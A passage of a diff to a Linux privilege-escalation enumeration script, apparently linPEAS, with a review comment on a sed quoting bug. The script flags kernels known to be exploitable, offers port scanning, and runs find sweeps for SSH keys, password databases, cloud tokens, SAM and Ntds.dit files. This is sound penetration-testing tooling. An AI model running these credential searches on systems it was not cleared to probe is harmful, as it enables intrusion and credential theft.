"s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} 
"s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," printf $LG"User & Groups: "$NC -(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$idB,${SED_RED},g" printf $LG"Hostname: "$NC hostname 2>/dev/null printf $LG"Writable folder: "$NC; echo $Wfolder if [ "$DISCOVER_BAN_GOOD" ]; then - printf $Y"[+] $DISCOVER_BAN_GOOD\n"$NC + printf ${YELLOW}"[+] $DISCOVER_BAN_GOOD\n"$NC else printf $RED"[-] $DISCOVER_BAN_BAD\n"$NC fi if [ "$SCAN_BAN_GOOD" ]; then - printf $Y"[+] $SCAN_BAN_GOOD\n"$NC + printf ${YELLOW}"[+] 
$SCAN_BAN_GOOD\n"$NC else printf $RED"[-] $SCAN_BAN_BAD\n"$NC fi if [ "`command -v nmap 2>/dev/null`" ];then - NMAP_GOOD=$GREEN"nmap$B is available for network discover & port scanning, you should use it yourself" - printf $Y"[+] $NMAP_GOOD\n"$NC + NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discover & port scanning, you should use it yourself" + printf ${YELLOW}"[+] $NMAP_GOOD\n"$NC fi echo "" echo "" @@ -891,7 +995,7 @@ if [ "$PORTS" ]; then if [ "$SCAN_BAN_GOOD" ]; then if [ "`echo -n $PORTS | sed 's,[0-9, ],,g'`" ]; then printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; - printf $B"$HELP"$NC; + printf ${BLUE}"$HELP"$NC; exit 0 else #Select the correct configuration of the netcat found @@ -899,10 +1003,10 @@ if [ "$PORTS" ]; then fi else printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC; - printf $B"$HELP"$NC; + printf ${BLUE}"$HELP"$NC; exit 0 fi -fi +fi if [ "$DISCOVERY" ]; then if [ "$PORTS" ]; then @@ -917,7 +1021,7 @@ if [ "$DISCOVERY" ]; then exit 0 elif [ "$IP" ]; then - select_nc + select_nc tcp_port_scan $IP "$PORTS" exit 0 fi 
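Review bot: In the "User & Groups" pipeline the highlight `sed "s,$USER,${C}[1;95m&${C}[0m,g"` is applied unconditionally; when `$USER` is unset, which is common in reverse shells and cron contexts, sed receives an empty pattern, GNU sed aborts with "no previous regular expression" and the whole `id` line vanishes from the report. Guarding it, e.g. `sed "s,${USER:-__none__},${C}[1;95m&${C}[0m,g"`, keeps the output intact. On style, the colour refactor in this hunk stops short: the `$sh_usrs` and `$USER` substitutions still embed raw `${C}[1;96m…` / `${C}[1;95m…` sequences while every neighbouring substitution was moved to a `SED_*` name, so two more constants would make the pipeline uniform. These lines are top-level script rather than part of a function.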
@@ -927,170 +1031,148 @@ if [ "`echo $CHECKS | grep ProCronSrvcsTmrsSocks`" ] || [ "`echo $CHECKS | grep ########################################### #----------) Caching Finds (--------------# ########################################### - - prep_to_find() { - echo "$1" | sed 's/ /" -o -name "/g' | sed 's/^/ -name "/g' | sed 's/$/" /g' - } - printf $GREEN"Caching directories using$Y $THREADS$GREEN threads "$NC - SYSTEMD_RELEVANT_NAMES="*.service" - TIMERS_RELEVANT_NAMES="*.timer" - SOCKETS_RELEVANT_NAMES="*.socket" - DBUS_RELEVANT_NAMES="system.d session.d" - - MYSQL_RELEVANT_NAMES="mysql" - POSTGRESQL_RELEVANT_NAMES="pgadmin*.db pg_hba.conf postgresql.conf pgsql.conf" - APACHE_RELEVANT_NAMES="sites-enabled 000-default" - PHP_RELEVANT_NAMES="sess_* *config*.php database.php db.php storage.php" - WORDPRESS_RELEVANT_NAMES="wp-config.php" - DRUPAL_RELEVANT_NAMES="settings.php" - MOODLE_RELEVANT_NAMES="/config.php" - TOMCAT_RELEVANT_NAMES="tomcat-users.xml" - MONGO_RELEVANT_NAMES="mongod*.conf" - SUPERVISORD_RELEVANT_NAMES="supervisord.conf" - CESI_RELEVANT_NAMES="cesi.conf" - RSYNCD_RELEVANT_NAMES="rsyncd.conf rsyncd.secrets" - HOSTAPAD_RELEVANT_NAMES="hostapd.conf" - ANACONDA_KS_RELEVANT_NAMES="anaconda-ks.cfg" - VNC_RELEVANT_NAMES=".vnc" - LDAP_RELEVANT_NAMES="ldap" - OVPN_RELEVANT_NAMES="*.ovpn" - SSH_RELEVANT_NAMES="id_dsa* id_rsa* known_hosts authorized_hosts authorized_keys *.pem *.cer *.crt *.csr *.der *.pfx *.p12 agent* config vault-ssh-helper.hcl .vault-token" - CLOUD_KEYS_RELEVANT_NAMES="credentials credentials.db legacy_credentials.db access_tokens.db accessTokens.json azureProfile.json cloud.cfg" - KERBEROS_RELEVANT_NAMES="krb5.conf krb5.keytab .k5login kadm5.acl" - KIBANA_RELEVANT_NAMES="kibana.y*ml" - KNOCK_RELEVANT_NAMES="knockd" - LOGSTASH_RELEVANT_NAMES="logstash" - ELASTICSEARCH_RELEVANT_NAMES="elasticsearch.y*ml" - COUCHDB_RELEVANT_NAMES="couchdb" - REDIS_RELEVANT_NAMES="redis.conf" - MOSQUITTO_RELEVANT_NAMES="mosquitto.conf" - 
NEO4J_RELEVANT_NAMES="neo4j" - ERLANG_RELEVANT_NAMES=".erlang.cookie" - GVM_RELEVANT_NAMES="gvm-tools.conf" - IPSEC_RELEVANT_NAMES="ipsec.secrets ipsec.conf" - IRSSI_RELEVANT_NAMES=".irssi" - KEYRING_RELEVANT_NAMES="keyrings *.keyring *.keystore" - FILEZILLA_RELEVANT_NAMES="filezilla" - BACKUPMANAGER_RELEVANT_NAMES="storage.php database.php" - PASSWD_SPLUNK_RELEVANT_NAMES="passwd" - GITLAB_RELEVANT_NAMES="secrets.yml gitlab.yml gitlab.rb" - PGP_RELEVANT_NAMES="*.pgp *.gpg .gnupg" - VIM_RELEVANT_NAMES=".*.swp .viminfo" - DOCKER_RELEVANT_NAMES="docker.sock docker.socket Dockerfile docker-compose.yml" - FIREFOX_RELEVANT_NAMES=".mozilla" - CHROME_RELEVANT_NAMES="google-chrome" - AUTOLOGIN_RELEVANT_NAMES="autologin autologin.conf" - FASTCGI_RELEVANT_NAMES="fastcgi_params" - SNMP_RELEVANT_NAMES="snmpd.conf" - - DB_RELEVANT_NAMES="*.db *.sqlite *.sqlite3 *.sql" - INSTERESTING_RELEVANT_NAMES=".msmtprc .env .google_authenticator *_history .recently-used.xbel .lesshst .sudo_as_admin_successful .profile *bashrc *httpd.conf *.plan .htpasswd .gitconfig .git-credentials .git .svn *.rhost hosts.equiv .ldaprc" - PASSWORD_RELEVANT_NAMES="*password* *credential* creds*" - BACKUPS_DIRS_RELEVANT_NAMES="backup backups" + printf $GREEN"Caching directories "$NC - FIND_SYSTEMD_RELEVANT_NAMES=$(prep_to_find "$SYSTEMD_RELEVANT_NAMES") - FIND_TIMERS_RELEVANT_NAMES=$(prep_to_find "$TIMERS_RELEVANT_NAMES") - FIND_SOCKETS_RELEVANT_NAMES=$(prep_to_find "$SOCKETS_RELEVANT_NAMES") - FIND_DBUS_RELEVANT_NAMES=$(prep_to_find "$DBUS_RELEVANT_NAMES") - - FIND_MYSQL_RELEVANT_NAMES=$(prep_to_find "$MYSQL_RELEVANT_NAMES") - FIND_POSTGRESQL_RELEVANT_NAMES=$(prep_to_find "$POSTGRESQL_RELEVANT_NAMES") - FIND_APACHE_RELEVANT_NAMES=$(prep_to_find "$APACHE_RELEVANT_NAMES") - FIND_PHP_RELEVANT_NAMES=$(prep_to_find "$PHP_RELEVANT_NAMES") - FIND_WORDPRESS_RELEVANT_NAMES=$(prep_to_find "$WORDPRESS_RELEVANT_NAMES") - FIND_DRUPAL_RELEVANT_NAMES=$(prep_to_find "$DRUPAL_RELEVANT_NAMES") - 
FIND_MOODLE_RELEVANT_NAMES=$(prep_to_find "$MOODLE_RELEVANT_NAMES") - FIND_TOMCAT_RELEVANT_NAMES=$(prep_to_find "$TOMCAT_RELEVANT_NAMES") - FIND_MONGO_RELEVANT_NAMES=$(prep_to_find "$MONGO_RELEVANT_NAMES") - FIND_SUPERVISORD_RELEVANT_NAMES=$(prep_to_find "$SUPERVISORD_RELEVANT_NAMES") - FIND_CESI_RELEVANT_NAMES=$(prep_to_find "$CESI_RELEVANT_NAMES") - FIND_RSYNCD_RELEVANT_NAMES=$(prep_to_find "$RSYNCD_RELEVANT_NAMES") - FIND_HOSTAPAD_RELEVANT_NAMES=$(prep_to_find "$HOSTAPAD_RELEVANT_NAMES") - FIND_ANACONDA_KS_RELEVANT_NAMES=$(prep_to_find "$ANACONDA_KS_RELEVANT_NAMES") - FIND_VNC_RELEVANT_NAMES=$(prep_to_find "$VNC_RELEVANT_NAMES") - FIND_LDAP_RELEVANT_NAMES=$(prep_to_find "$LDAP_RELEVANT_NAMES") - FIND_OVPN_RELEVANT_NAMES=$(prep_to_find "$OVPN_RELEVANT_NAMES") - FIND_SSH_RELEVANT_NAMES=$(prep_to_find "$SSH_RELEVANT_NAMES") - FIND_CLOUD_KEYS_RELEVANT_NAMES=$(prep_to_find "$CLOUD_KEYS_RELEVANT_NAMES") - FIND_KERBEROS_RELEVANT_NAMES=$(prep_to_find "$KERBEROS_RELEVANT_NAMES") - FIND_KIBANA_RELEVANT_NAMES=$(prep_to_find "$KIBANA_RELEVANT_NAMES") - FIND_KNOCK_RELEVANT_NAMES=$(prep_to_find "$sK_RELEVANT_NAMES") - FIND_LOGSTASH_RELEVANT_NAMES=$(prep_to_find "$LOGSTASH_RELEVANT_NAMES") - FIND_ELASTICSEARCH_RELEVANT_NAMES=$(prep_to_find "$ELASTICSEARCH_RELEVANT_NAMES") - FIND_COUCHDB_RELEVANT_NAMES=$(prep_to_find "$COUCHDB_RELEVANT_NAMES") - FIND_REDIS_RELEVANT_NAMES=$(prep_to_find "$REDIS_RELEVANT_NAMES") - FIND_MOSQUITTO_RELEVANT_NAMES=$(prep_to_find "$MOSQUITTO_RELEVANT_NAMES") - FIND_NEO4J_RELEVANT_NAMES=$(prep_to_find "$NEO4J_RELEVANT_NAMES") - FIND_ERLANG_RELEVANT_NAMES=$(prep_to_find "$ERLANG_RELEVANT_NAMES") - FIND_GVM_RELEVANT_NAMES=$(prep_to_find "$GVM_RELEVANT_NAMES") - FIND_IPSEC_RELEVANT_NAMES=$(prep_to_find "$IPSEC_RELEVANT_NAMES") - FIND_IRSSI_RELEVANT_NAMES=$(prep_to_find "$IRSSI_RELEVANT_NAMES") - FIND_KEYRING_RELEVANT_NAMES=$(prep_to_find "$KEYRING_RELEVANT_NAMES") - FIND_FILEZILLA_RELEVANT_NAMES=$(prep_to_find "$FILEZILLA_RELEVANT_NAMES") - 
FIND_BACKUPMANAGER_RELEVANT_NAMES=$(prep_to_find "$BACKUPMANAGER_RELEVANT_NAMES") - FIND_PASSWD_SPLUNK_RELEVANT_NAMES=$(prep_to_find "$PASSWD_SPLUNK_RELEVANT_NAMES") - FIND_GITLAB_RELEVANT_NAMES=$(prep_to_find "$GITLAB_RELEVANT_NAMES") - FIND_PGP_RELEVANT_NAMES=$(prep_to_find "$PGP_RELEVANT_NAMES") - FIND_VIM_RELEVANT_NAMES=$(prep_to_find "$VIM_RELEVANT_NAMES") - FIND_DOCKER_RELEVANT_NAMES=$(prep_to_find "$DOCKER_RELEVANT_NAMES") - FIND_FIREFOX_RELEVANT_NAMES=$(prep_to_find "$FIREFOX_RELEVANT_NAMES") - FIND_CHROME_RELEVANT_NAMES=$(prep_to_find "$CHROME_RELEVANT_NAMES") - FIND_AUTOLOGIN_RELEVANT_NAMES=$(prep_to_find "$AUTOLOGIN_RELEVANT_NAMES") - FIND_FASTCGI_RELEVANT_NAMES=$(prep_to_find "$FASTCGI_RELEVANT_NAMES") - FIND_SNMP_RELEVANT_NAMES=$(prep_to_find "$SNMP_RELEVANT_NAMES") - - FIND_DB_RELEVANT_NAMES=$(prep_to_find "$DB_RELEVANT_NAMES") - FIND_INSTERESTING_RELEVANT_NAMES=$(prep_to_find "$INSTERESTING_RELEVANT_NAMES") - FIND_PASSWORD_RELEVANT_NAMES=$(prep_to_find "$PASSWORD_RELEVANT_NAMES") - FIND_BACKUPS_DIRS_RELEVANT_NAMES=$(prep_to_find "$BACKUPS_DIRS_RELEVANT_NAMES") - - #Get home + #Get home HOMESEARCH="/home/ /Users/ /root/ `cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " "`" if [ ! "`echo \"$HOMESEARCH\" | grep \"$HOME\"`" ] && [ ! 
"`echo \"$HOMESEARCH\" | grep -E \"^/root|^/home|^/Users\"`" ]; then #If not listed and not in /home, /Users/ or /root, add current home folder HOMESEARCH="$HOME $HOMESEARCH" fi + GREPHOMESEARCH=`echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|"` #Remove ending spaces before putting "|" - # Directories CONT_THREADS=0 - FIND_DIR_VAR=`eval_bckgrd "find /var -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_DBUS_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_HOME=`eval_bckgrd "find $HOMESEARCH -type d $FIND_CHROME_RELEVANT_NAMES -o $FIND_FIREFOX_RELEVANT_NAMES -o $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_MYSQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d $FIND_MYSQL_RELEVANT_NAMES -o $FIND_CHROME_RELEVANT_NAMES -o $FIND_FIREFOX_RELEVANT_NAMES -o $FIND_BACKUPS_DIRS_RELEVANT_NAMES -o $FIND_FILEZILLA_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_VNC_RELEVANT_NAMES -o $FIND_LDAP_RELEVANT_NAMES -o $FIND_KERBEROS_RELEVANT_NAMES -o $FIND_LOGSTASH_RELEVANT_NAMES -o $FIND_COUCHDB_RELEVANT_NAMES -o $FIND_NEO4J_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_IRSSI_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` + # FIND ALL KNOWN INTERESTING SOFTWARE FILES + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \"system.d\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" -o -name \".mozilla\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"seeddms*\" -o -name \".irssi\" -o -name \"logstash\" -o -name \"filelliza\" -o -name \".svn\" -o -name \"bind\" -o -name \".cloudflared\" -o -name \"couchdb\" -o -name \".vnc\" -o -name \"sites-enabled\" -o -name \"neo4j\" -o -name \"ldap\" -o -name \"keyrings\" -o -name \"mysql\" -o -name \".bluemix\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"unattended.xml\" -o -name \"ipsec.secrets\" -o -name \"gitlab.rm\" -o -name \"SAM\" -o -name \"passwd\" -o -name \"docker.sock\" -o -name \"security\" -o -name \"*.sqlite\" -o -name \"gvm-tools.conf\" -o -name \"*vnc*.txt\" -o -name \"unattend.inf\" -o -name \"security.sav\" -o -name \"*.kdbx\" -o -name \"config.php\" -o -name \"KeePass.config*\" -o -name \"SYSTEM\" -o -name \"*.cer\" -o -name \".git\" -o -name \"anaconda-ks.cfg\" -o -name \"sitemanager.xml\" -o -name \"*.gpg\" -o -name \"access_tokens.json\" -o -name \"*.db\" -o -name \"id_rsa*\" -o -name \"*.keystore\" -o -name \"postgresql.conf\" -o -name \"id_dsa*\" -o -name \"*.gnupg\" -o -name \"db.php\" -o -name \"tomcat-users.xml\" -o -name \"*.pgp\" -o -name \"access_tokens.db\" -o -name \"pagefile.sys\" -o -name \"credentials.db\" -o -name \"rsyncd.conf\" -o -name \"fastcgi_params\" -o -name \"https.conf\" -o -name \"*.sqlite3\" -o -name \"wp-config.php\" -o -name \"default.sav\" -o -name \"*.jks\" -o -name \".rhosts\" -o -name \"*vnc*.c*nf*\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"backups\" -o -name \"Dockerfile\" -o -name \"krb5.conf\" -o -name \"000-default\" -o -name \"filezilla.xml\" -o -name \"setupinfo\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \".lesshst\" -o -name \".sudo_as_admin_successful\" -o -name \"Ntds.dit\" -o -name \"mongod*.conf\" -o -name \"*.timer\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*vnc*.xml\" -o -name \".*_history\" -o -name \".pypirc\" -o -name \"my.cnf\" -o -name \"*.swp\" -o -name 